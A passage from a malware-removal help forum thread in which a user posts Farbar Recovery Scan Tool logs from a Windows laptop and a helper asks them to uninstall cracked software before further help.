Libraries\redist\intel64\compiler;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\NVIDIA Corporation\NVIDIA NvDLISR;C:\Program Files\MATLAB\R2019b\bin;C:\ProgramData\chocolatey\bin;C:\Program Files (x86)\FontForgeBuilds\bin;C:\Program Files\nodejs\ HKCU\Environment\\Path -> ;C:\Users\FRANCIS\AppData\Local\Programs\Microsoft VS Code\bin;C:\Users\FRANCIS\AppData\Roaming\npm HKU\S-1-5-21-3936790745-3440936247-791344644-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\FRANCIS\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper HKU\S-1-5-21-3936790745-3440936247-791344644-1002\Control Panel\Desktop\\Wallpaper -> C:\WINDOWS\web\wallpaper\Windows\img0.jpg DNS Servers: 192.168.15.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == (If an entry is included in the fixlist, it will be removed.) HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0" HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0" HKLM\...\StartupApproved\Run32: => "TeamsMachineInstaller" HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\StartupFolder: => "GenuineService.lnk" HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\StartupFolder: => "Send to OneNote.lnk" HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\Run: => "com.squirrel.Teams.Teams" HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\Run: => "BitTorrent" HKU\S-1-5-21-3936790745-3440936247-791344644-1001\...\StartupApproved\Run: => "Lync" HKU\S-1-5-21-3936790745-3440936247-791344644-1002\...\StartupApproved\Run: => "com.squirrel.Teams.Teams" ==================== FirewallRules (Whitelisted) ================ (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [UDP Query User{33CC5D8F-A04C-4287-98A2-248BF85E83CA}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File FirewallRules: [TCP Query User{2FDCF539-A9A5-418E-915D-A9F6DE9DB683}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File FirewallRules: [UDP Query User{E9A63349-3DAD-43E9-A0C2-4B2F8C93E608}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File FirewallRules: [TCP Query User{B5DCAAF9-24E1-46F6-99C1-35F496281A4A}C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\windows.old\users\francis\appdata\roaming\bittorrent\bittorrent.exe => No File FirewallRules: [{07BBFCF6-DF65-47F5-85C2-7D1B7C24B1A3}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{2888FD9A-0240-4993-8574-4D6FE92763C9}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{0456832C-81E2-4CB4-A595-ADAA5BE13C5A}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{C756A12D-A4ED-4DE2-BABB-B63C963899F5}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{55C341D3-D845-4467-B7D4-A1A3C9365514}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{92E821F5-0067-4BE8-87DC-FF54D1DDAF46}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\BitTorrent\BitTorrent.exe (BitTorrent Inc -> BitTorrent Inc.) FirewallRules: [{AA11FF77-EA4F-41ED-8B5D-3EE615A05069}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\Zoom\bin\Zoom.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.) FirewallRules: [{E5F8868D-3083-4DA4-9765-2120F6BF9795}] => (Allow) C:\Users\FRANCIS\AppData\Roaming\Zoom\bin\airhost.exe (Zoom Video Communications, Inc. -> Zoom Video Communications, Inc.) FirewallRules: [{0BA8BD44-83D9-40E6-A999-E4D37858CBB0}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe => No File FirewallRules: [{717921BB-9091-4EED-A4CD-7505A7ED940F}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe => No File FirewallRules: [TCP Query User{C2385DA0-E699-4532-9801-1101007A4A24}C:\program files\the sims 4\game\bin\ts4_x64.exe] => (Allow) C:\program files\the sims 4\game\bin\ts4_x64.exe (Electronic Arts Inc.) [File not signed] FirewallRules: [UDP Query User{9BE27131-2F41-4793-B132-6CA531C80BFA}C:\program files\the sims 4\game\bin\ts4_x64.exe] => (Allow) C:\program files\the sims 4\game\bin\ts4_x64.exe (Electronic Arts Inc.) [File not signed] FirewallRules: [TCP Query User{7E8B4214-F799-4C32-B0FA-0C501D6B769F}C:\users\francis\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\francis\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [UDP Query User{620EE8CA-B37A-4A2B-960E-839973E37DCA}C:\users\francis\appdata\local\microsoft\teams\current\teams.exe] => (Allow) C:\users\francis\appdata\local\microsoft\teams\current\teams.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{1B5FFB87-BD24-4AAB-8232-877F7C32E185}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{6EB62FA3-39D4-4B05-A11B-582C247C8AFE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{D46C3A74-A2FD-4549-8A91-5A292FD373D7}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{1A279772-FE45-4B7F-98BC-83D4DC4D3B1F}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{65533106-6D9B-4ED1-A603-23424A01100A}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{2E7F0967-8379-4D15-A8F7-A0C70358B61D}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.68.96.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [TCP Query User{62309B5E-7E93-452D-85D7-5ECA8B8D2138}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [UDP Query User{C53D51E0-69B0-447A-9628-66CDE2C11DD7}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [TCP Query User{1DC8F033-ACD2-43D0-810E-40C8034169CB}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [UDP Query User{0E7FB93C-3FCF-492C-8942-5F9902E6AF3D}C:\users\francis\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\francis\appdata\roaming\spotify\spotify.exe (Spotify AB -> Spotify Ltd) FirewallRules: [{49F5DBB5-AFEA-4EA5-925F-7B913B073C46}] => (Allow) C:\Program Files\The Sims 2 Ultimate Collection\Fun with Pets\SP9\TSBin\Sims2EP9.exe (Maxis, a division of Electronic Arts Inc.) [File not signed] FirewallRules: [{A7C37344-5433-47B3-9391-0549424B09C3}] => (Allow) C:\Program Files\The Sims 2 Ultimate Collection\Fun with Pets\SP9\TSBin\Sims2EP9.exe (Maxis, a division of Electronic Arts Inc.) [File not signed] FirewallRules: [{F97B6736-0B66-4DD1-9300-900E438ADC1D}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe (Lenovo -> ) FirewallRules: [{1595DAE1-94A1-4BEE-8C9A-8A2A87AD69FA}] => (Allow) C:\Program Files (x86)\Lenovo\System Update\uncserver.exe (Lenovo -> ) FirewallRules: [{B1443A2D-C10F-4D7B-B0E5-D23CE1F9FCD3}] => (Block) C:\Program Files\EaseUS\EaseUS Data Recovery Wizard\DRW.exe => No File FirewallRules: [{CE7DA8F3-C864-4218-8034-F5E810694A18}] => (Block) C:\Program Files\EaseUS\EaseUS Data Recovery Wizard\DRWUI.exe => No File FirewallRules: [{E525347A-A948-4513-9338-37E34903389E}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{53DA5FCB-03B1-47B3-8F3F-1C013CF5B3FB}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{CD74709F-9987-4A09-A025-6E452B134692}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{72085FAE-6A37-4774-ABCF-028B74723DC4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{B1A406EC-89D8-405E-8973-45A8BD00BCC0}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{A96D2325-0844-4943-9D87-D23DAC9F6AC7}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{4171C853-6EDB-4B71-B2DF-FFF66E8374C3}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (NVIDIA Corporation -> NVIDIA Corporation) FirewallRules: [{88742A13-B4E2-4613-8E55-3C211095B389}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe (McAfee, LLC -> McAfee, LLC) FirewallRules: [{91FB82E9-2BB5-4174-92D6-2C4CE2C0DE26}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe (McAfee, LLC -> McAfee, LLC) FirewallRules: [{09A668FD-A7A6-4801-AB23-266C7E561E6F}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe (McAfee, LLC -> McAfee, LLC) FirewallRules: [{9A9D7F93-D218-463D-9E4C-9702C0D2FE41}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{CDB1353C-D9B2-4804-9C27-DC3587BFF5CE}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation) ==================== Restore Points ========================= 05-05-2021 11:36:48 Scheduled Checkpoint 06-05-2021 09:53:15 Windows Modules Installer 06-05-2021 10:20:21 Windows Modules Installer ==================== Faulty Device Manager Devices ============ ==================== Event log errors: ======================== Application errors: ================== Error: (05/06/2021 02:59:50 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Microsoft.Photos.exe version 2020.20120.4004.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. Process ID: 1784 Start Time: 01d7424531db65b3 Termination Time: 4294967295 Application Path: C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe Report Id: 6fa2ff16-ef10-4395-8bcc-aab6ec1bd2fb Faulting package full name: Microsoft.Windows.Photos_2020.20120.4004.0_x64__8wekyb3d8bbwe Faulting package-relative application ID: App Hang type: Activation Error: (05/04/2021 08:47:57 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine QueryFullProcessImageNameW. hr = 0x80070006, The handle is invalid. . Operation: Executing Asynchronous Operation Context: Current State: DoSnapshotSet Error: (05/04/2021 06:10:10 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program Launch.exe version 18.11.154.0 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. Process ID: 1194 Start Time: 01d740ccf4ff8045 Termination Time: 4294967295 Application Path: C:\Program Files\McAfee\CoreUI\Launch.exe Report Id: 35ebc678-069c-40ac-b971-731f75b6a443 Faulting package full name: Faulting package-relative application ID: Hang type: Top level window is idle Error: (05/04/2021 03:15:28 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program LockApp.exe version 10.0.19041.844 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel. Process ID: 3194 Start Time: 01d740b4590f7113 Termination Time: 4294967295 Application Path: C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe Report Id: 4be4fb5e-765c-4158-bed0-36c963af4ca4 Faulting package full name: Microsoft.LockApp_10.0.19041.423_neutral__cw5n1h2txyewy Faulting package-relative application ID: WindowsDefaultLockScreen Hang type: Quiesce Error: (05/03/2021 08:58:44 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x000003fc,SYSTEM\CurrentControlSet\Services\VSS\Diag\VssvcPublisher,0,REG_BINARY,000000A037CFED20.72). hr = 0x80070005, Access is denied. . Error: (05/03/2021 08:58:44 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000288,SYSTEM\CurrentControlSet\Services\VSS\Diag\COM+ REGDB Writer,0,REG_BINARY,000000A0380FF280.72). hr = 0x80070005, Access is denied. . Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {542da469-d3e1-473c-9f4f-7847f01fc64f} Writer Name: COM+ REGDB Writer Writer Instance ID: {e7e2a211-c1b2-447a-86e8-0f1a13d9d43d} Error: (05/03/2021 08:58:44 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000280,(null),0,REG_BINARY,0000002CF238D800.72). hr = 0x80070005, Access is denied. . Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0} Writer Name: WMI Writer Writer Instance ID: {8d07eb09-1827-4d85-ab69-35736fff7086} Error: (05/03/2021 08:58:44 PM) (Source: VSS) (EventID: 8193) (User: ) Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000288,SYSTEM\CurrentControlSet\Services\VSS\Diag\COM+ REGDB Writer,0,REG_BINARY,000000A0380FF290.72). hr = 0x80070005, Access is denied. . Operation: BackupShutdown Event Context: Execution Context: Writer Writer Class Id: {542da469-d3e1-473c-9f4f-7847f01fc64f} Writer Name: COM+ REGDB Writer Writer Instance ID: {e7e2a211-c1b2-447a-86e8-0f1a13d9d43d} System errors: ============= Error: (05/06/2021 03:15:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The Malwarebytes Service service failed to start due to the following error: Windows cannot verify the digital signature for this file. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Error: (05/06/2021 02:54:53 PM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Update Orchestrator Service service hung on starting. Error: (05/06/2021 02:51:46 PM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Downloaded Maps Manager service hung on starting. Error: (05/06/2021 02:49:28 PM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Delivery Optimization service hung on starting. Error: (05/06/2021 02:47:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The Windows Presentation Foundation Font Cache 3.0.0.0 service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion. Error: (05/06/2021 02:47:23 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: A timeout was reached (30000 milliseconds) while waiting for the Windows Presentation Foundation Font Cache 3.0.0.0 service to connect. Error: (05/06/2021 02:47:17 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The System Interface Foundation Service service failed to start due to the following error: The service did not respond to the start or control request in a timely fashion. Error: (05/06/2021 02:47:17 PM) (Source: Service Control Manager) (EventID: 7009) (User: ) Description: A timeout was reached (30000 milliseconds) while waiting for the System Interface Foundation Service service to connect. Windows Defender: ================ Date: 2021-04-28 09:47:58 Description: Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2021-04-25 11:06:26 Description: Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Custom Scan Date: 2021-04-24 13:21:56 Description: Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2021-04-23 11:40:41 Description: Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Full Scan Date: 2021-04-23 11:30:45 Description: Microsoft Defender Antivirus scan has been stopped before completion. Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2021-05-06 08:48:28 Description: Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version: Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Update Server Security intelligence Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.18000.5 Error code: 0x80070102 Error description: The wait operation timed out. Date: 2021-05-06 08:48:28 Description: Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version: Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Update Server Security intelligence Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.18000.5 Error code: 0x80070102 Error description: The wait operation timed out. Date: 2021-04-28 10:07:42 Description: Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version: Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Malware Protection Center Security intelligence Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.18000.5 Error code: 0x80072ee2 Error description: The operation timed out Date: 2021-04-28 10:07:42 Description: Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version: Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Malware Protection Center Security intelligence Type: AntiSpyware Update Type: Full Current Engine Version: Previous Engine Version: 1.1.18000.5 Error code: 0x80072ee2 Error description: The operation timed out Date: 2021-04-28 10:07:42 Description: Microsoft Defender Antivirus has encountered an error trying to update security intelligence. New security intelligence Version: Previous security intelligence Version: 1.335.1614.0 Update Source: Microsoft Malware Protection Center Security intelligence Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.18000.5 Error code: 0x80072ee2 Error description: The operation timed out CodeIntegrity: =============== Date: 2021-05-06 15:15:01 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\services.exe) attempted to load \Device\HarddiskVolume3\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe that did not meet the Custom 3 / Antimalware signing level requirements. Date: 2021-05-06 15:12:52 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Windows signing level requirements. Date: 2021-05-06 15:01:13 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe) attempted to load \Device\HarddiskVolume3\Program Files\McAfee\MfeAV\AMSIExt_x86.dll that did not meet the Microsoft signing level requirements. Date: 2021-05-06 14:56:51 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MpCmdRun.exe) attempted to load \Device\HarddiskVolume3\Program Files\McAfee\MfeAV\AMSIExt.dll that did not meet the Microsoft signing level requirements. ==================== Memory info =========================== BIOS: LENOVO 3JCN31WW 07/17/2018 Motherboard: LENOVO Torronto 4C2 Processor: Intel® Core™ i5-7200U CPU @ 2.50GHz Percentage of memory in use: 75% Total physical RAM: 6044.22 MB Available physical RAM: 1493.79 MB Total Virtual: 8860.22 MB Available Virtual: 3824.48 MB ==================== Drives ================================ Drive c: (Windows) (Fixed) (Total:890.12 GB) (Free:148.74 GB) NTFS Drive d: (LENOVO) (Fixed) (Total:25 GB) (Free:16.12 GB) NTFS \\?\Volume{7b078799-1b7a-482a-b117-b30df98f6356}\ (WINRE_DRV) (Fixed) (Total:0.98 GB) (Free:0.48 GB) NTFS \\?\Volume{e8a927c2-8256-4564-bc60-9955bd9de628}\ (LENOVO_PART) (Fixed) (Total:14.17 GB) (Free:1.55 GB) NTFS \\?\Volume{3d83052a-24c6-47f1-b841-9e158ac65522}\ (SYSTEM_DRV) (Fixed) (Total:0.25 GB) (Free:0.22 GB) FAT32 ==================== MBR & Partition Table ==================== ========================================================== Disk: 0 (Size: 931.5 GB) (Disk ID: E59E8286) Partition: GPT. ==================== End of Addition.txt =======================

#6 Oh My!

Adware and Spyware and Malware

Malware Response Instructor
61,636 posts
OFFLINE

Gender:Male
Location:California
Local time:09:21 AM

Posted 06 May 2021 - 08:14 PM

Greetings. Thank you for the report. Unfortunately there is evidence of potentially illegal software on your computer. I am going to request you completely uninstall Adobe Master Collection software and all other products for which you do not have a valid Product Key, including all "cracked" software. . If you are willing to do that please rerun a FRST scan after removal and copy/paste both reports in your reply. If you prefer to leave the program(s) on your computer let me know that and I will be closing the Topic.

Lord, to whom shall we go? You have the words of eternal life and we have believed and have come to know that you are the Holy One of God.John 6:68-69The Man on the Middle Cross Said I Could Come

#7 Jones2021Riano

Topic Starter
Members
45 posts
OFFLINE

Local time:01:21 AM

Posted 06 May 2021 - 10:28 PM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28-04-2021 Ran by FRANCIS (administrator) on LAPTOP-LOE6RFKD (LENOVO 80TU) (07-05-2021 10:55:15) Running from C:\Users\FRANCIS\Downloads Loaded Profiles: FRANCIS Platform: Windows 10 Home Single Language Version 20H2 19042.964 (X64) Language: English (United States) Default browser not detected! Boot Mode: Normal ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) () [File not signed] C:\Program Files\MATLAB\R2019b\bin\win64\MATLABStartupAccelerator.exe (Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe (Conexant Systems, Inc. -> Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe (Conexant Systems, Inc. -> Conexant Systems, Inc) C:\Program Files\CONEXANT\SAII\SmartAudio.exe (Conexant Systems, Inc. -> Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\CAudioFilterAgent64.exe (Conexant Systems, Inc. -> Conexant Systems, Inc.) C:\Windows\System32\SASrv.exe (Conexant Systems, Inc.) [File not signed] C:\Program Files\CONEXANT\SAII\CxUtilSvc.exe (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.) C:\Program Files\Dolby\Dolby DAX2\DAX2_APP\DolbyDAX2TrayIcon.exe (Fortemedia Inc -> ) C:\Program Files\CONEXANT\ForteConfig\fmapp.exe (Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxCUIService.exe (Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\igfxEM.exe (Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\IntelCpHDCPSvc.exe (Intel® pGFX -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_1a33d2f73651d989\IntelCpHeciSvc.exe (Intel® Rapid Storage Technology -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\iaahcic.inf_amd64_f222132bfa8270de\RstMwService.exe (Lanzhou Itanium Software Technology Co., Ltd. -> Zbshareware Lab) C:\Program Files (x86)\USB Disk Security\USBGuard.exe (Lenovo (Beijing) Limited -> Lenovo Group Limited) C:\Users\FRANCIS\AppData\Local\Programs\Lenovo\Lenovo Service Bridge\LSBUpdater.exe (Lenovo -> ) C:\Program Files (x86)\Lenovo\System Update\SUService.exe (Lenovo -> ) C:\Program Files (x86)\Lenovo\System Update\TvsuCommandLauncher.exe <2> (Lenovo -> ) C:\Program Files (x86)\Lenovo\System Update\UNCServer.exe (Lenovo -> Lenovo Group Ltd.) C:\ProgramData\Lenovo\ImController\Plugins\LenovoBatteryGaugePackage\x64\BGHelper.exe (Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost\Lenovo.Modern.ImController.PluginHost.Device.exe <2> (Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\PluginHost86\Lenovo.Modern.ImController.PluginHost.Device.exe <3> (Lenovo -> Lenovo Group Ltd.) C:\Windows\Lenovo\ImController\Service\Lenovo.Modern.ImController.exe (McAfee, Inc. -> McAfee LLC.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe (McAfee, Inc. -> McAfee, LLC) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe (McAfee, Inc. -> McAfee, LLC) C:\Windows\System32\mfevtps.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\CSP\4.1.106.0\McCSPServiceHost.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe <3> (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\Common Files\McAfee\VSCore_20_12\mcapexe.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MAT\McPvTray.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\servicehost.exe (McAfee, LLC -> McAfee, LLC) C:\Program Files\McAfee\WebAdvisor\uihost.exe (McAfee, LLC. -> McAfee, LLC.) C:\ProgramData\McAfee\McInstruTrack\McInstruTrack.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe (Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe (Microsoft Corporation -> Microsoft Corporation) C:\Users\FRANCIS\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2> (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dxgiadaptercache.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe <2> (Microsoft Windows Publisher -> Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe <3> (Node.js Foundation -> Node.js) C:\Program Files\Adobe\Adobe Creative Cloud Experience\libs\node.exe (NVIDIA Corporation -> Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA 